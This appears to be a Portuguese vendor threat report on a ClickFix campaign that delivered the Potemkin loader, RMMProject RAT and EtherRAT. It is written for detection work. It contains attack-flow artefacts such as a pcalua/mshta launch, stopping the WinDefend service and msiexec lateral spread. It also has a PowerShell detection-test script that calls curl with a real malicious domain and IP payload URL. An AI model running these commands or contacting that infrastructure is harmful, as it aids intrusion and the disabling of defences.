Seguir 
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumo
Uma campanha de engenharia social ClickFix foi usada para implantar o carregador Potemkin, que posteriormente entregou tanto o RMMProject RAT quanto o EtherRAT. A intrusão incluiu atividade manual no teclado, movimento lateral através de WMIExec e SMBExec, e tentativas de enfraquecer ou desativar o Microsoft Defender. No total, os atacantes se espalharam por mais de 11 sistemas dentro do ambiente da vítima.
Investigação
A investigação rastreou o comprometimento até um endpoint não gerenciado onde um usuário executou um comando malicioso. Os analistas identificaram um carregador customizado chamado Potemkin que usava um algoritmo determinístico de geração de domínio, junto com um RAT habilitado para Lua chamado RMMProject que podia contornar a Criptografia Vinculada a Aplicativos do Chrome. Os pesquisadores também documentaram o EtherRAT, que recupera a infraestrutura de comando e controle através do blockchain Ethereum, bem como o uso de túneis Chisel durante a intrusão.
Mitigação
Uma das defesas mais eficazes é desabilitar a caixa de diálogo Executar do Windows através da Política de Grupo para reduzir a chance de execução do ClickFix. As organizações também devem habilitar a Proteção contra Alteração do Microsoft Defender e monitorar mudanças de registro não autorizadas que afetam as configurações de segurança ou tentativas de desativar o WinDefend serviço. A cobertura ampla e consistente de endpoints continua sendo essencial para impedir que os atacantes ganhem uma posição inicial.
Resposta
Se essa atividade for detectada, os respondentes devem isolar os sistemas afetados imediatamente para interromper o movimento lateral adicional. A remediação deve incluir a finalização de processos maliciosos do Node.js, remoção de mecanismos de persistência identificados como chaves de execução e tarefas agendadas, e limpeza de caminhos de exclusão do Microsoft Defender não autorizados. Uma varredura completa no ambiente é necessária, pois os métodos de persistência podem diferir de um host para outro.
"graph TB %% Class Definitions classDef initial_access fill:#f96,stroke:#333,stroke-width:2px classDef execution fill:#3498db,stroke:#333,stroke-width:2px classDef defense_evasion fill:#9b59b6,stroke:#333,stroke-width:2px classDef persistence fill:#2ecc71,stroke:#333,stroke-width:2px classDef c2 fill:#e74c3c,stroke:#333,stroke-width:2px classDef credential_access fill:#f1c40f,stroke:#333,stroke-width:2px classDef lateral_movement fill:#1abc9c,stroke:#333,stroke-width:2px classDef defense_impairment fill:#34495e,stroke:#333,stroke-width:2px %% Initial Access and Execution Phase action_clickfix["<b>Ação</b> – <b>T1204.004 Execução do Usuário: Copiar e Colar Malicioso</b><br/>Descrição: O usuário é enganado via engenharia social ClickFix para colar e executar um comando na caixa de diálogo Executar do Windows.<br/><b/>Artefatos: cmd /min /c pcalua.exe -a mshta.exe…"] class action_clickfix initial_access exec_mshta["<b/>Ação</b> – <b>T1218.005 Execução de Proxy de Binário de Sistema: Mshta</b><br/>Descrição: Abusa do pcalua.exe para executar o mshta.exe para buscar carga útil HTA remota.<br/><b/>Artefatos: carga útil hte.hta, pcalua.exe"] class exec_mshta execution exec_msiexec["<b/>Ação</b> – <b>T1218.007 Execução de Proxy de Binário de Sistema: Msiexec</b><br/>Descrição: Pacote MSI malicioso é instalado silenciosamente usando msiexec.<br/><b/>Artefatos: inst24.msi, msiexec /qn"] class exec_msiexec execution %% Persistence and Loader Phase persist_netsh["<b/>Ação</b> – <b>T1546.007 Execução Disparada por Evento: DLL de Ajuda Netsh</b><br/>Descrição: Persistência estabelecida via um componente AutostartRegistry MSI.<br/><b/>Artefatos: carregador Potemkin, RunSearch.exe em %LOCALAPPDATA%MicrosoftRunSearch"] class persist_netsh persistence %% Command and Control Phase c2_dga["<b/>Ação</b> – <b>T1568 Resolução Dinâmica</b><br/>Descrição: Carregador Potemkin usa um Algoritmo de Geração de Domínio para encontrar servidores C2.<br/><b/>Artefatos: Potemkin DGA"] class c2_dga c2 c2_ether["<b/>Ação</b> – <b>T1568 Resolução Dinâmica</b><br/>Descrição: EtherRAT resolve seu endereço C2 do blockchain Ethereum via EtherHiding.<br/><b/>Artefatos: EtherRAT"] class c2_ether c2 %% Credential Access Phase cred_steal["<b/>Ação</b> – <b>T1539 Roubo de Cookie de Sessão Web</b><br/>Descrição: RMMProject RAT visa navegadores para roubar cookies e credenciais via injeção de DLL para contornar a Criptografia Vinculada a Aplicativos do Chrome.<br/><b/>Artefatos: RMMProject, bancos de dados SQLite do navegador"] class cred_steal credential_access %% Lateral Movement Phase lat_move["<b/>Ação</b> – <b>T1210 Exploração de Serviços Remotos</b><br/>Descrição: O atacante se move lateralmente usando WMIExec e SMBExec para espalhar o instalador MSI.<br/><b/>Artefatos: WMIExec, SMBExec, msiexec /i <IP>ADMIN$Temp…"] class lat_move lateral_movement %% Defense Impairment Phase def_impair["<b/>Ação</b> – <b>T1687 Exploração para Impedimento de Defesa</b><br/>Descrição: Combatendo o Windows Defender ao alterar o AMSI, escrevendo políticas de registro e parando o serviço.<br/><b/>Artefatos: chaves de registro DisableAntiSpyware, Stop-Service WinDefend, alteração do AMSI"] class def_impair defense_impairment %% C2 Tunneling Phase c2_tunnel["<b/>Ação</b> – <b>T1572 Tunelamento de Protocolo</b><br/>Descrição: Usando Chisel para estabelecer túneis SOCKS reversos e túneis Cloudflare para expor serviços internos.<br/><b/>Artefatos: Chisel, cloudflared renomeado para svchost.exe"] class c2_tunnel c2 %% Connections %% Flow from initial access to execution action_clickfix –>|leads_to| exec_mshta action_clickfix –>|leads_to| exec_msiexec %% Execution leads to persistence exec_msiexec –>|installs| persist_netsh %% Persistence leads to C2 and Loader deployment persist_netsh –>|deploys| c2_dga persist_netsh –>|deploys| c2_ether %% C2 activities lead to credential access c2_dga –>|executes| cred_steal c2_ether –>|executes| cred_steal %% Lateral movement spreads the attack cred_steal –>|enables| lat_move lat_move –>|deploys_to_new_hosts| exec_msiexec %% Defense impairment protects the attacker exec_mshta –>|used_to_patch| def_impair def_impair –>|facilitates| c2_tunnel "
Fluxo de Ataque
Detecções
Execução de Processos do Sistema a partir de Caminhos Abertos (via criação_de_processos)
Ver
Alterações Suspeitas nas Preferências do Windows Defender (via powershell)
Ver
Possíveis Pontos de Persistência [ASEPs – Hive de Software/NTUSER] (via evento_de_registro)
Ver
Desativação das Proteções do Windows Defender (via evento_de_registro)
Ver
Possíveis Padrões de Linha de Comando do Impacket (via cmdline)
Ver
Interrupção de Serviço de Ransomware Suspeito (via cmdline)
Ver
A Possibilidade de Execução através de Linhas de Comando PowerShell Ocultas (via cmdline)
Ver
Binário NodeJS Executando de Local Incomum (via cmdline)
Ver
LOLBAS Pcalua (via cmdline)
Ver
Comportamento de Evasão de Defesa LOLBAS MSHTA Suspeito pela Detecção de Comandos Associados (via criação_de_processos)
Ver
LOLBAS Conhost (via cmdline)
Ver
Uso de Certutil para Codificação de Dados e Operações de Certificado (via cmdline)
Ver
Possível Uso de Ferramentas de Tunelamento [Windows] (via cmdline)
Ver
Uso Suspeito de CURL (via cmdline)
Ver
Chamar Métodos .NET Suspeitos a partir do PowerShell (via powershell)
Ver
Arquivo Executável Suspeito Nomeado como um Processo de Sistema Legítimo foi Criado (via evento_de_arquivo)
Ver
Possível Tentativa de Abuso do Publicnode Ethereum como Canal C2 (via consulta_dns)
Ver
Download de Arquivo Suspeito – IP Direto (via proxy)
Ver
Execução de Script PowerShell e Manipulação do Windows Defender [Windows Powershell]
Ver
Detecção de Comunicação C2 Baseada em Ethereum pelo EtherRAT [Conexão de Rede do Windows]
Ver
Detecção de Entrega de Carga Útil HTA do ClickFix via Mshta.exe [Criação de Processo do Windows]
Ver
Execução de Simulação
Pré-requisito: A Verificação Pré-voo de Telemetria & Baseline deve ter sido aprovada.
Justificativa: Esta seção detalha a execução precisa da técnica do adversário (TTP) projetada para acionar a regra de detecção. Os comandos e a narrativa DEVEM refletir diretamente as TTPs identificadas e visam gerar a telemetria exata esperada pela lógica de detecção. Exemplos abstratos ou não relacionados levarão a um diagnóstico incorreto.
-
Narrativa de Ataque & Comandos: O adversário busca estabelecer um canal C2 usando o método de assinatura do EtherRAT. Para evitar a análise estática de sua configuração de malware, eles usam
curlpara realizar uma solicitação HTTP POST a um endpoint público de RPC do Ethereum (https://eth.drpc.org). Esta solicitação é projetada para buscar o IP/domínio C2 real do blockchain. Para satisfazer a lógica específica da regra de detecção atual, o comando é estruturado para incluir o domínio malicioso conhecidoanus-staylard.xyzdentro dos argumentos da linha de comando, simulando a fase de entrega de carga ou configuração. -
Script de Teste de Regressão:
# Simulação de resolução C2 do EtherRAT via Ethereum RPC # Este script imita os padrões de linha de comando específicos necessários para acionar a regra Sigma. $maliciousDomain = "anus-staylard.xyz" $rpcEndpoint = "https://eth.drpc.org" $maliciousIpString = "77.110.122.58:23205/lQhEQui9a4lZ.exe" # Construindo o comando para corresponder à lógica (seleção1 OU seleção2) E seleção3 # Padrão: curl -s -X POST https://eth.drpc.org ... anus-staylard.xyz $cmd = "curl.exe -s -X POST $rpcEndpoint -d 'data=query' --user-agent '$maliciousDomain' --referer '$maliciousIpString'" Write-Host "[+] Executando comando simulado do EtherRAT: $cmd" Start-Process "cmd.exe" -ArgumentList "/c $cmd" -NoNewWindow -
Comandos de Limpeza:
# Nenhum arquivo permanente é criado por esta simulação; # apenas a execução de processos efêmeros ocorre. Write-Host "[+] Simulação completa. Nenhuma limpeza necessária."